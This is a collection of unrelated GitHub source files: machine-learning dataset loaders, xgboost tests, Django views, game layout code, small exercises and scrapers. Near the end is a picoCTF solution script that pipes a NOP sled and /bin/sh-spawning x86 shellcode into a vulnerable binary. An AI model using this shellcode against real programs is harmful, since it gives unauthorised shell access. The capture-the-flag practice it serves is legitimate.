| 2,414
|
py
|
import evovrp.file as file
import evovrp.method as method
import evovrp.directory as directory
import evovrp.evaluation as evaluation
from random import randint
from NiaPy.util import Task, OptimizationType
from NiaPy.algorithms.basic.ga import GeneticAlgorithm
def print_result(best_instance):
"""Prints a result.
Prints overall best instance information to output.
Args:
best_instance: A Fitness object, indicating overall best instance.
Returns:
Method does not return anything.
"""
print('Best instance: ')
print('Generation: ' + str(best_instance.generation))
print('Instance: ' + str(best_instance.instance))
print('Fitness: ' + str(round(best_instance.value, 2)))
print('Phenotype: ' + str(best_instance.phenotype))
def main(file_name, algorithm, iterations, population_size, phenotype_coding):
"""Main function.
    Function is used for connecting the main parts of the project. First, it
    deletes any previously created image directories. Then it calls the file
    reading method to obtain parsed objects, creates a new task with the given
    information and runs it using the selected evolutionary algorithm.
    Lastly, it prints the information of the overall best instance to output.
Args:
file_name: A string, indicating name of a file, which will be read.
algorithm: A NiaPy algorithm, indicating evolutionary algorithm
that will be used.
iterations: An integer, indicating number of repetitions.
population_size: An integer, indicating number of instances that will
be created inside one generation.
phenotype_coding: An enum type, indicating which genotype-to-phenotype
coding will be used in evaluation.
Returns:
Method does not return anything.
"""
directory.Directory().delete_directories()
objects = file.File.read('../datasets/' + file_name)
task = Task(D=len(objects[1]), nFES=iterations, benchmark=evaluation.Evaluation(
objects, iterations, population_size, phenotype_coding), optType=OptimizationType.MINIMIZATION)
alg = algorithm(seed=randint(1000, 10000), task=task, NP=population_size)
result, fitness = alg.run()
print_result(evaluation.Evaluation.find_overall_best_instance(fitness))
if __name__ == '__main__':
main('C-mdvrptw/pr00', GeneticAlgorithm, 25, 5, method.Method.FIRST)
|
[
"matic.pintaric@outlook.com"
] |
matic.pintaric@outlook.com
|
42ce07fdee63e3aa5561265f2db6540b6095364b
|
ae4b075d34694a2d3b94892a2caead1dc6c6090b
|
/datasets/svhn.py
|
c136901f2ac1fb3c623a52b80c1b0978a0361459
|
[] |
no_license
|
MagnumEnforcer/self-supervised-learning
|
943f15130ac47839df8083f964b9223003905cad
|
115271aee4ebfb63fe8c89c93f7f4ac00638155a
|
refs/heads/main
| 2023-06-21T12:49:47.965418
| 2021-08-04T19:41:32
| 2021-08-04T19:41:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,988
|
py
|
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from torchvision.datasets.svhn import SVHN as _SVHN
class SVHN(_SVHN):
num_classes = 10
def __init__(self,
root: str,
split: str = 'train',
transform: object = None,
**kwargs):
super(SVHN, self).__init__(root=root,
split=split,
transform=transform,
download=kwargs.get('download', False))
assert isinstance(self.labels, np.ndarray) and self.labels.ndim == 1
assert isinstance(self.data, np.ndarray) and self.data.ndim == 4
self.data = np.transpose(self.data, (0, 2, 3, 1))
if 'proportion' in kwargs:
if kwargs['proportion'] < 1.:
raise NotImplementedError
def __getitem__(self, idx):
img, label = self.data[idx], self.labels[idx]
if self.transform is not None:
img = self.transform(img)
return dict(x=img, y=label, idx=idx)
class SVHNForMoCo(_SVHN):
def __init__(self,
root: str,
split: str = 'train',
query_transform: object = None,
key_transform: object = None):
super(SVHNForMoCo, self).__init__(root=root,
split=split,
transform=None,
target_transform=None,
download=False)
self.data = np.transpose(self.data, (0, 2, 3, 1))
self.query_transform = query_transform
self.key_transform = key_transform
def __getitem__(self, idx):
img, label = self.data[idx], self.labels[idx]
x1 = self.query_transform(img)
x2 = self.key_transform(img)
return dict(x1=x1, x2=x2, y=label, idx=idx)
class SVHNForCLAPP(_SVHN):
def __init__(self,
root: str,
split: str = 'train',
query_transform: object = None,
key_transform: object = None,
pseudo_transform: object = None):
super(SVHNForCLAPP, self).__init__(root=root,
split=split,
transform=None,
target_transform=None,
download=False)
self.data = np.transpose(self.data, (0, 2, 3, 1))
self.query_transform = query_transform
self.key_transform = key_transform
self.pseudo_transform = pseudo_transform
def __getitem__(self, idx):
img, label = self.data[idx], self.labels[idx]
x1 = self.query_transform(img)
x2 = self.key_transform(img)
x3 = self.pseudo_transform(img)
return dict(x1=x1, x2=x2, x3=x3, y=label, idx=idx)
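

# --- Usage sketch added for illustration; 'download=True' and the './data'
# root are assumptions. ToTensor accepts the HWC uint8 arrays this class
# yields, so no extra conversion is needed. ---
if __name__ == '__main__':
    from torch.utils.data import DataLoader
    from torchvision import transforms

    dataset = SVHN(root='./data', split='train',
                   transform=transforms.ToTensor(), download=True)
    loader = DataLoader(dataset, batch_size=256, shuffle=True)
    batch = next(iter(loader))   # dict with keys 'x', 'y', 'idx'
    print(batch['x'].shape)      # torch.Size([256, 3, 32, 32])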
|
[
"hgkahng@korea.ac.kr"
] |
hgkahng@korea.ac.kr
|
dac023cdab21e9d629d5d88ea13757f7b48df408
|
6a92f3be6482748148d431dfcb652b0816d288f7
|
/tests/python-gpu/test_gpu_prediction.py
|
6324e117b3e8f1e8977741d82b05ec6e50eb81cc
|
[
"Apache-2.0"
] |
permissive
|
Gerbuz/xgboost
|
24c1c8787d981aa9f0654382667a87ad1baf6bb3
|
38ee51478740cb1aae1cfa0791168d384c388082
|
refs/heads/master
| 2022-10-21T03:15:21.243492
| 2020-06-17T04:39:23
| 2020-06-17T04:39:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,076
|
py
|
import sys
import unittest
import pytest
import numpy as np
import xgboost as xgb
sys.path.append("tests/python")
import testing as tm
from test_predict import run_threaded_predict # noqa
rng = np.random.RandomState(1994)
class TestGPUPredict(unittest.TestCase):
def test_predict(self):
iterations = 10
np.random.seed(1)
test_num_rows = [10, 1000, 5000]
test_num_cols = [10, 50, 500]
# This test passes for tree_method=gpu_hist and tree_method=exact. but
# for `hist` and `approx` the floating point error accumulates faster
# and fails even tol is set to 1e-4. For `hist`, the mismatching rate
# with 5000 rows is 0.04.
for num_rows in test_num_rows:
for num_cols in test_num_cols:
dtrain = xgb.DMatrix(np.random.randn(num_rows, num_cols),
label=[0, 1] * int(num_rows / 2))
dval = xgb.DMatrix(np.random.randn(num_rows, num_cols),
label=[0, 1] * int(num_rows / 2))
dtest = xgb.DMatrix(np.random.randn(num_rows, num_cols),
label=[0, 1] * int(num_rows / 2))
watchlist = [(dtrain, 'train'), (dval, 'validation')]
res = {}
param = {
"objective": "binary:logistic",
"predictor": "gpu_predictor",
'eval_metric': 'logloss',
'tree_method': 'gpu_hist',
'max_depth': 1
}
bst = xgb.train(param, dtrain, iterations, evals=watchlist,
evals_result=res)
assert self.non_increasing(res["train"]["logloss"])
gpu_pred_train = bst.predict(dtrain, output_margin=True)
gpu_pred_test = bst.predict(dtest, output_margin=True)
gpu_pred_val = bst.predict(dval, output_margin=True)
param["predictor"] = "cpu_predictor"
bst_cpu = xgb.train(param, dtrain, iterations, evals=watchlist)
cpu_pred_train = bst_cpu.predict(dtrain, output_margin=True)
cpu_pred_test = bst_cpu.predict(dtest, output_margin=True)
cpu_pred_val = bst_cpu.predict(dval, output_margin=True)
np.testing.assert_allclose(cpu_pred_train, gpu_pred_train,
rtol=1e-6)
np.testing.assert_allclose(cpu_pred_val, gpu_pred_val,
rtol=1e-6)
np.testing.assert_allclose(cpu_pred_test, gpu_pred_test,
rtol=1e-6)
def non_increasing(self, L):
return all((y - x) < 0.001 for x, y in zip(L, L[1:]))
# Test case for a bug where multiple batch predictions made on a
# test set produce incorrect results
@pytest.mark.skipif(**tm.no_sklearn())
def test_multi_predict(self):
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
n = 1000
X, y = make_regression(n, random_state=rng)
X_train, X_test, y_train, y_test = train_test_split(X, y,
random_state=123)
dtrain = xgb.DMatrix(X_train, label=y_train)
dtest = xgb.DMatrix(X_test)
params = {}
params["tree_method"] = "gpu_hist"
params['predictor'] = "gpu_predictor"
bst_gpu_predict = xgb.train(params, dtrain)
params['predictor'] = "cpu_predictor"
bst_cpu_predict = xgb.train(params, dtrain)
predict0 = bst_gpu_predict.predict(dtest)
predict1 = bst_gpu_predict.predict(dtest)
cpu_predict = bst_cpu_predict.predict(dtest)
assert np.allclose(predict0, predict1)
assert np.allclose(predict0, cpu_predict)
@pytest.mark.skipif(**tm.no_sklearn())
def test_sklearn(self):
m, n = 15000, 14
tr_size = 2500
X = np.random.rand(m, n)
y = 200 * np.matmul(X, np.arange(-3, -3 + n))
X_train, y_train = X[:tr_size, :], y[:tr_size]
X_test, y_test = X[tr_size:, :], y[tr_size:]
# First with cpu_predictor
params = {'tree_method': 'gpu_hist',
'predictor': 'cpu_predictor',
'n_jobs': -1,
'seed': 123}
m = xgb.XGBRegressor(**params).fit(X_train, y_train)
cpu_train_score = m.score(X_train, y_train)
cpu_test_score = m.score(X_test, y_test)
# Now with gpu_predictor
params['predictor'] = 'gpu_predictor'
m = xgb.XGBRegressor(**params).fit(X_train, y_train)
gpu_train_score = m.score(X_train, y_train)
gpu_test_score = m.score(X_test, y_test)
assert np.allclose(cpu_train_score, gpu_train_score)
assert np.allclose(cpu_test_score, gpu_test_score)
@pytest.mark.skipif(**tm.no_cupy())
def test_inplace_predict_cupy(self):
import cupy as cp
cp.cuda.runtime.setDevice(0)
rows = 1000
cols = 10
cp_rng = cp.random.RandomState(1994)
cp.random.set_random_state(cp_rng)
X = cp.random.randn(rows, cols)
y = cp.random.randn(rows)
dtrain = xgb.DMatrix(X, y)
booster = xgb.train({'tree_method': 'gpu_hist'},
dtrain, num_boost_round=10)
test = xgb.DMatrix(X[:10, ...])
predt_from_array = booster.inplace_predict(X[:10, ...])
predt_from_dmatrix = booster.predict(test)
cp.testing.assert_allclose(predt_from_array, predt_from_dmatrix)
def predict_dense(x):
inplace_predt = booster.inplace_predict(x)
d = xgb.DMatrix(x)
copied_predt = cp.array(booster.predict(d))
return cp.all(copied_predt == inplace_predt)
for i in range(10):
run_threaded_predict(X, rows, predict_dense)
@pytest.mark.skipif(**tm.no_cudf())
def test_inplace_predict_cudf(self):
import cupy as cp
import cudf
import pandas as pd
rows = 1000
cols = 10
rng = np.random.RandomState(1994)
cp.cuda.runtime.setDevice(0)
X = rng.randn(rows, cols)
X = pd.DataFrame(X)
y = rng.randn(rows)
X = cudf.from_pandas(X)
dtrain = xgb.DMatrix(X, y)
booster = xgb.train({'tree_method': 'gpu_hist'},
dtrain, num_boost_round=10)
test = xgb.DMatrix(X)
predt_from_array = booster.inplace_predict(X)
predt_from_dmatrix = booster.predict(test)
cp.testing.assert_allclose(predt_from_array, predt_from_dmatrix)
def predict_df(x):
inplace_predt = booster.inplace_predict(x)
d = xgb.DMatrix(x)
copied_predt = cp.array(booster.predict(d))
return cp.all(copied_predt == inplace_predt)
for i in range(10):
run_threaded_predict(X, rows, predict_df)
|
[
"noreply@github.com"
] |
Gerbuz.noreply@github.com
|
15dc87f1cf93f9b2f6112e12584d8b2874f44525
|
b35923f3170cc765ae1c77df432ca653e7c574cb
|
/accounts/views.py
|
5ee44c124dc5e9345924c53c83e6a205825e77dc
|
[] |
no_license
|
sudoshweta/My_JIRA
|
a3fa9b643029dfa3a3b43e617fb3178f75b96160
|
e46f7f44991d4b4dfc946235b924374c3b78bab0
|
refs/heads/master
| 2020-03-22T11:27:40.127857
| 2018-07-05T10:38:59
| 2018-07-05T10:38:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 778
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.views import generic
from django.views.generic import View
from .forms import SignupForm
def index(request):
return render(request, 'a.html')
#def signup(request):
# return render(request, 'signup.html')
def login(request):
return render(request, 'login.html')
class UserFormView(View):
form_class =SignupForm
template_name = 'signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form':form})
    def post(self, request):
        form = self.form_class(request.POST)
        if form.is_valid():
            user = form.save(commit=False)
            user.save()
            return redirect('index')  # assumed url name for the index view above
        return render(request, self.template_name, {'form': form})
|
[
"shwetasingh426060@gmail.com"
] |
shwetasingh426060@gmail.com
|
7ed2fecba76172cf4c9db655e2067ce08f16c25f
|
2ec7219f07b1c2b761c76ed0eae8108cc0ebb5cb
|
/experiments/scripts/setup_integrate_3d.py
|
318faf5a9fb6ac0121ea403ef9ad6ddf14b067e7
|
[] |
no_license
|
samueljmcameron/ABPs_coarse_graining
|
f4eac2c0810f516917e80dfd0d732dd2f1d7a6dc
|
68face0c92b3b76be29767f261e52e2b5509922d
|
refs/heads/master
| 2020-09-10T15:10:51.029675
| 2020-05-22T08:09:30
| 2020-05-22T08:09:30
| 221,733,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 521
|
py
|
from setuptools import setup
import numpy
from Cython.Build import cythonize
setup(
name='Integrate in 3d',
ext_modules = cythonize('integrate_3d.pyx',annotate=True,
compiler_directives={'boundscheck' : False,
'wraparound' : False,
'nonecheck' : False,
'cdivision' : True}),
include_dirs=[numpy.get_include()],
zip_safe=False,
)
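
# Typical invocation (added for reference): build the extension in place so
# that `import integrate_3d` works from this directory:
#   python setup_integrate_3d.py build_ext --inplace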
|
[
"samuel.j.m.cameron@gmail.com"
] |
samuel.j.m.cameron@gmail.com
|
860d4185936f17a997095a651d33d38e5a18ebbf
|
522e755b313fe52320765f5ab45a8bbe2b3c0420
|
/pondus_download.py
|
c582f77189f474671872525212bfe755c8bc593e
|
[] |
no_license
|
danieman/pondusdl
|
b6547290cf1bd06a6cfc0177e2573f657b9e911c
|
842bf5a0ea40be9c7f45b999b85a5c9e4e410625
|
refs/heads/main
| 2023-06-21T03:00:51.363094
| 2021-07-14T22:02:46
| 2021-07-14T22:02:46
| 386,082,240
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,216
|
py
|
import requests
from bs4 import BeautifulSoup
from datetime import datetime
from pathlib import Path
from urllib.request import urlretrieve
WEBPAGE = "https://www.adressa.no/kultur/tegneserier/pondus/"
DIRECTORY = Path.home() / "pondus"
def find_images(url):
"""Takes a web page URL as input, and returns a list of relevant image URLs."""
r = requests.get(url)
soup = BeautifulSoup(r.text, "html.parser")
img_tags = soup.find_all("img")
image_urls = [img["src"] for img in img_tags]
return image_urls
def download_image(url, filename):
"""Downloads image and prints a confirmation to stdout."""
urlretrieve(url, filename)
time_str = datetime.now().strftime("[%Y-%m-%d %H:%M]")
print(f"{time_str} Downloaded {filename}!")
if __name__ == "__main__":
images = find_images(WEBPAGE)
# Create ./striper/ if necessary
if not (DIRECTORY / "striper").is_dir():
Path.mkdir(DIRECTORY / "striper")
# Download all new images to ./striper/
for image in images:
filename = DIRECTORY / "striper" / f"{image.split('/')[-1]}"
if not Path.is_file(filename) and "_pon_" in str(filename):
download_image(image, str(filename))
|
[
"hellnope1337@definitelynope.no"
] |
hellnope1337@definitelynope.no
|
db27e58936ee029169bd1e6839f1c07c7b26a7c3
|
574164eb23ab712054261aee57a48fa46f3a888b
|
/toontown/coghq/CountryClubLayout.py
|
b03d854750c8df1ffe2b11b2d49e88de61d0b960
|
[] |
no_license
|
CrankySupertoonArchive/toontownhardmode
|
210256bc1a3a889a3b2d6eb6d030b224e3cbbbda
|
fcee8926a10f36b8a4373fcbb518b18fad2aaeec
|
refs/heads/master
| 2021-06-15T07:41:47.761067
| 2017-03-19T17:27:53
| 2017-03-19T17:27:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,001
|
py
|
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import invertDictLossless
from toontown.coghq import CountryClubRoomSpecs
from toontown.toonbase import ToontownGlobals
from direct.showbase.PythonUtil import normalDistrib, lerp
import random
def printAllBossbotInfo():
print 'roomId: roomName'
for roomId, roomName in CountryClubRoomSpecs.BossbotCountryClubRoomId2RoomName.items():
print '%s: %s' % (roomId, roomName)
print '\nroomId: numBattles'
for roomId, numBattles in CountryClubRoomSpecs.roomId2numBattles.items():
print '%s: %s' % (roomId, numBattles)
print '\ncountryClubId floor roomIds'
printCountryClubRoomIds()
print '\ncountryClubId floor numRooms'
printNumRooms()
print '\ncountryClubId floor numForcedBattles'
printNumBattles()
def iterateBossbotCountryClubs(func):
from toontown.toonbase import ToontownGlobals
for countryClubId in [ToontownGlobals.BossbotCountryClubIntA, ToontownGlobals.BossbotCountryClubIntB, ToontownGlobals.BossbotCountryClubIntC]:
for floorNum in xrange(ToontownGlobals.CountryClubNumFloors[countryClubId]):
func(CountryClubLayout(countryClubId, floorNum))
def printCountryClubInfo():
def func(ml):
print ml
iterateBossbotCountryClubs(func)
def printCountryClubRoomIds():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getRoomIds()
iterateBossbotCountryClubs(func)
def printCountryClubRoomNames():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getRoomNames()
iterateBossbotCountryClubs(func)
def printNumRooms():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getNumRooms()
iterateBossbotCountryClubs(func)
def printNumBattles():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getNumBattles()
iterateBossbotCountryClubs(func)
ClubLayout2_0 = [(0, 2, 5, 9, 17), (0, 2, 5, 9, 18)]
ClubLayout2_1 = [(0, 2, 5, 9, 17), (0, 2, 5, 9, 18)]
ClubLayout2_2 = [(0, 2, 6, 9, 17), (0, 2, 6, 9, 18)]
ClubLayout4_0 = [(0, 22, 5, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 5, 29, 18)]
ClubLayout4_1 = [(0, 22, 6, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 4, 29, 17),
(0, 22, 6, 29, 18)]
ClubLayout4_2 = [(0, 22, 6, 29, 17),
(0, 22, 5, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 7, 29, 18)]
ClubLayout6_0 = [(0, 32, 5, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 7, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 7, 39, 18)]
ClubLayout6_1 = [(0, 32, 5, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 7, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 7, 39, 18)]
ClubLayout6_2 = [(0, 32, 6, 39, 17),
(0, 32, 7, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 7, 39, 18)]
countryClubLayouts = [ClubLayout2_0,
ClubLayout2_1,
ClubLayout2_2,
ClubLayout4_0,
ClubLayout4_1,
ClubLayout4_2,
ClubLayout6_0,
ClubLayout6_1,
ClubLayout6_2]
testLayout = [ClubLayout2_0,
ClubLayout2_0,
ClubLayout2_0,
ClubLayout4_0,
ClubLayout4_0,
ClubLayout4_0,
ClubLayout6_0,
ClubLayout6_0,
ClubLayout6_0]
countryClubLayouts = testLayout
class CountryClubLayout:
notify = DirectNotifyGlobal.directNotify.newCategory('CountryClubLayout')
def __init__(self, countryClubId, floorNum, layoutIndex):
self.countryClubId = countryClubId
self.floorNum = floorNum
self.layoutIndex = layoutIndex
self.roomIds = []
self.hallways = []
self.numRooms = 1 + ToontownGlobals.CountryClubNumRooms[self.countryClubId][0]
self.numHallways = self.numRooms - 1 + 1
self.roomIds = countryClubLayouts[layoutIndex][floorNum]
hallwayRng = self.getRng()
connectorRoomNames = CountryClubRoomSpecs.BossbotCountryClubConnectorRooms
for i in xrange(self.numHallways):
self.hallways.append(hallwayRng.choice(connectorRoomNames))
def _genFloorLayout(self):
rng = self.getRng()
startingRoomIDs = CountryClubRoomSpecs.BossbotCountryClubEntranceIDs
middleRoomIDs = CountryClubRoomSpecs.BossbotCountryClubMiddleRoomIDs
finalRoomIDs = CountryClubRoomSpecs.BossbotCountryClubFinalRoomIDs
numBattlesLeft = ToontownGlobals.CountryClubNumBattles[self.countryClubId]
finalRoomId = rng.choice(finalRoomIDs)
numBattlesLeft -= CountryClubRoomSpecs.getNumBattles(finalRoomId)
middleRoomIds = []
middleRoomsLeft = self.numRooms - 2
numBattles2middleRoomIds = invertDictLossless(CountryClubRoomSpecs.middleRoomId2numBattles)
allBattleRooms = []
for num, roomIds in numBattles2middleRoomIds.items():
if num > 0:
allBattleRooms.extend(roomIds)
while 1:
allBattleRoomIds = list(allBattleRooms)
rng.shuffle(allBattleRoomIds)
battleRoomIds = self._chooseBattleRooms(numBattlesLeft,
allBattleRoomIds)
if battleRoomIds is not None:
break
CountryClubLayout.notify.info('could not find a valid set of battle rooms, trying again')
middleRoomIds.extend(battleRoomIds)
middleRoomsLeft -= len(battleRoomIds)
if middleRoomsLeft > 0:
actionRoomIds = numBattles2middleRoomIds[0]
for i in xrange(middleRoomsLeft):
roomId = rng.choice(actionRoomIds)
actionRoomIds.remove(roomId)
middleRoomIds.append(roomId)
roomIds = []
roomIds.append(rng.choice(startingRoomIDs))
middleRoomIds.sort()
print 'middleRoomIds=%s' % middleRoomIds
roomIds.extend(middleRoomIds)
roomIds.append(finalRoomId)
return roomIds
def getNumRooms(self):
return len(self.roomIds)
def getRoomId(self, n):
return self.roomIds[n]
def getRoomIds(self):
return self.roomIds[:]
def getRoomNames(self):
names = []
for roomId in self.roomIds:
names.append(CountryClubRoomSpecs.BossbotCountryClubRoomId2RoomName[roomId])
return names
def getNumHallways(self):
return len(self.hallways)
def getHallwayModel(self, n):
return self.hallways[n]
def getNumBattles(self):
numBattles = 0
for roomId in self.getRoomIds():
numBattles += CountryClubRoomSpecs.roomId2numBattles[roomId]
return numBattles
def getCountryClubId(self):
return self.countryClubId
def getFloorNum(self):
return self.floorNum
def getRng(self):
return random.Random(self.countryClubId * self.floorNum)
def _chooseBattleRooms(self, numBattlesLeft, allBattleRoomIds, baseIndex = 0, chosenBattleRooms = None):
if chosenBattleRooms is None:
chosenBattleRooms = []
while baseIndex < len(allBattleRoomIds):
nextRoomId = allBattleRoomIds[baseIndex]
baseIndex += 1
newNumBattlesLeft = numBattlesLeft - CountryClubRoomSpecs.middleRoomId2numBattles[nextRoomId]
if newNumBattlesLeft < 0:
continue
elif newNumBattlesLeft == 0:
chosenBattleRooms.append(nextRoomId)
return chosenBattleRooms
chosenBattleRooms.append(nextRoomId)
result = self._chooseBattleRooms(newNumBattlesLeft, allBattleRoomIds, baseIndex, chosenBattleRooms)
if result is not None:
return result
else:
del chosenBattleRooms[-1:]
else:
return
return
def __str__(self):
return 'CountryClubLayout: id=%s, layoutIndex=%s, floor=%s, numRooms=%s, numBattles=%s' % (self.countryClubId,
self.layoutIndex,
self.floorNum,
self.getNumRooms(),
self.getNumBattles())
def __repr__(self):
return str(self)
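

# --- Illustration added: _chooseBattleRooms is a depth-first subset search
# over per-room battle counts. Below is a standalone sketch of the same idea,
# using plain integers instead of room ids (the name is hypothetical):
def _chooseCountsSketch(total, counts, base=0, picked=None):
    if picked is None:
        picked = []
    while base < len(counts):
        c = counts[base]
        base += 1
        if total - c < 0:
            continue
        picked.append(c)
        if total - c == 0:
            return picked
        result = _chooseCountsSketch(total - c, counts, base, picked)
        if result is not None:
            return result
        del picked[-1:]
    return None
# _chooseCountsSketch(3, [2, 1, 1]) -> [2, 1]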
|
[
"leotz58@gmail.com"
] |
leotz58@gmail.com
|
e57f3966a9d9a9ff011be89d95a3af59648e08d8
|
fc0eda8560a26c88b790d236070ed0559d0dc4a4
|
/leetcode/basicDS06_tree/b03_lc654_maximum_binary_tree.py
|
2e6bad124dcd6d0953d2e52293203245f5284c18
|
[] |
no_license
|
pankypan/DataStructureAndAlgo
|
b4bd417a16cdb594bbed2ca0220dbd63eb60f3c1
|
6c5d40d57d378994236549f8dea906c75121eadf
|
refs/heads/master
| 2021-08-03T01:22:08.442709
| 2021-07-19T14:56:44
| 2021-07-19T14:56:44
| 279,599,190
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,102
|
py
|
# https://leetcode-cn.com/problems/maximum-binary-tree/
from typing import List
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def __init__(self):
self.nums = list()
def get_max_index(self, start_i: int, end_i: int) -> int:
m_index, m_val = start_i, self.nums[start_i]
for i in range(start_i, end_i + 1):
if self.nums[i] > m_val:
m_val = self.nums[i]
m_index = i
return m_index
def constructMaximumBinaryTree(self, nums: List[int]) -> TreeNode:
self.nums = nums
return self.dfs(0, len(self.nums) - 1)
def dfs(self, start_i: int, end_i: int) -> TreeNode:
# base case
if start_i > end_i: return
        # Find the maximum value and its index
m_index = self.get_max_index(start_i, end_i)
root = TreeNode(self.nums[m_index])
        # Recurse to build the left and right subtrees
root.left = self.dfs(start_i, m_index - 1)
root.right = self.dfs(m_index + 1, end_i)
return root
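

# --- Worked example added for illustration, using the array from the problem
# statement: 6 is the global maximum and becomes the root, [3, 2, 1] builds
# the left subtree and [0, 5] the right.
if __name__ == '__main__':
    root = Solution().constructMaximumBinaryTree([3, 2, 1, 6, 0, 5])
    print(root.val, root.left.val, root.right.val)  # 6 3 5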
|
[
"1356523334@qq.com"
] |
1356523334@qq.com
|
7e337fa7519637972dcc9513bffb22bad84270b0
|
99aab5c2a40f8e146479dbd8778a2d52a8d4b8dc
|
/debug_ques_3.py
|
1fb58213603fae7f7fd851ce581f3768c5411853
|
[] |
no_license
|
poojasingh1995/MOREEXERCISE
|
2d76f12d7db432342590d652521214f5459711c0
|
a15aff39c47f6d6df695c553010ec02c2a4a2cca
|
refs/heads/main
| 2023-06-12T21:45:51.351342
| 2021-07-14T11:15:22
| 2021-07-14T11:15:22
| 385,912,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,833
|
py
|
def find_in_list(query, mainlist):
mainlist_len = len(mainlist)
range_for_loop = range(mainlist_len)
index = None
for i in range_for_loop:
element = mainlist[i]
if element == query:
index = i
return i
chars = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
shifted_chars = ['c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','a','b']
def encrypt_message(plain_msg):
encrypted_msg = ""
for character in plain_msg:
if character in chars:
char_index = find_in_list(character, chars)
new_char = shifted_chars[char_index]
encrypted_msg = encrypted_msg + new_char
else:
encrypted_msg = encrypted_msg + character
return encrypted_msg
def decrypt_message(encrypted_msg):
decrypted_msg = ""
for character in encrypted_msg:
if character in shifted_chars:
char_index = find_in_list(character, shifted_chars)
            new_char = chars[char_index]  # map back to the original alphabet to decrypt
decrypted_msg = decrypted_msg + new_char
else:
decrypted_msg = decrypted_msg + character
return decrypted_msg
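# example round trip: encrypt_message("abc") -> "cde"; decrypt_message("cde") -> "abc"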
flag = True
while flag:
choice = input("What do you want to do? 1. Encrypt a message 2. Decrypt a message Enter `e` or `d` respectively!")
if choice == 'e':
plain_message = input("Enter message to encrypt??")
print(encrypt_message(plain_message))
elif choice == 'd':
encrypted_msg = input("Enter message to decrypt?")
print(decrypt_message(encrypted_msg))
    play_again = input("Do you want to try again or exit? (Y/N)")
if play_again == 'Y':
continue
elif play_again == 'N':
break
|
[
"noreply@github.com"
] |
poojasingh1995.noreply@github.com
|
2573fbab9513ee871a79634eac860103fd0bb8ca
|
c90495e7698a799dc129f3ac7be3441df2a24a3d
|
/picoctf/picoctf2019/binary/slippery-shellcode/sh2.py
|
8f46ce7a84faaf060d3ef038c8e6f3b82947ecb7
|
[] |
no_license
|
xuan2261/ctf
|
1581fd46d0f1c2a0e12baf9e20b04fe3f5d29744
|
0dbce162c33263c73edf3114914abea2f30db37c
|
refs/heads/master
| 2022-12-04T02:50:46.559427
| 2020-08-28T07:38:58
| 2020-08-28T07:38:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 342
|
py
|
# save script in home directory /~
# run script from the slippery-shellcode directory
# python ~/p.py | ./vuln
NOP = "\x90" * 400
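# shellcode below (32-bit Linux): appears to close fd 0, reopen /dev/tty
# read/write, then execve /bin//sh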
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
print NOP + shellcode
|
[
"classicunix@gmail.com"
] |
classicunix@gmail.com
|
3aa76ffd63db7e4119c43176ad09db9b1e17cf92
|
da7ba5573a9ad5e44f8efb0d7f00ab9295dbae13
|
/test2/movie/migrations/0004_auto_20190508_0711.py
|
8a3f46654af977161cc4e446f517c0b83d899011
|
[] |
no_license
|
wangxuanlin/linux111
|
6d60bd24a75a89d8d9d3d1ba74133e85f725b516
|
76e15d9446cc681059569b6b0a15b12b283b228b
|
refs/heads/master
| 2022-02-02T08:23:04.254504
| 2019-07-05T09:26:14
| 2019-07-05T09:26:14
| 177,509,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-05-08 07:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movie', '0003_auto_20190507_0849'),
]
operations = [
migrations.AlterField(
model_name='biaoqian',
name='biaoqian',
field=models.CharField(max_length=8, verbose_name='电影标签'),
),
]
|
[
"admin@wangxuanlin.local"
] |
admin@wangxuanlin.local
|
10cacc066be6617ba6ef42034c5bbce30fd7c0f6
|
02d1d89ed3c2a71a4f5a36f3a19f0683a0ae37e5
|
/gui/foo/foo/helpers.py
|
3ad33e658cdd47155da1a8571451f9b9f30a4ff1
|
[] |
no_license
|
lforet/robomow
|
49dbb0a1c873f75e11228e24878b1e977073118b
|
eca69d000dc77681a30734b073b2383c97ccc02e
|
refs/heads/master
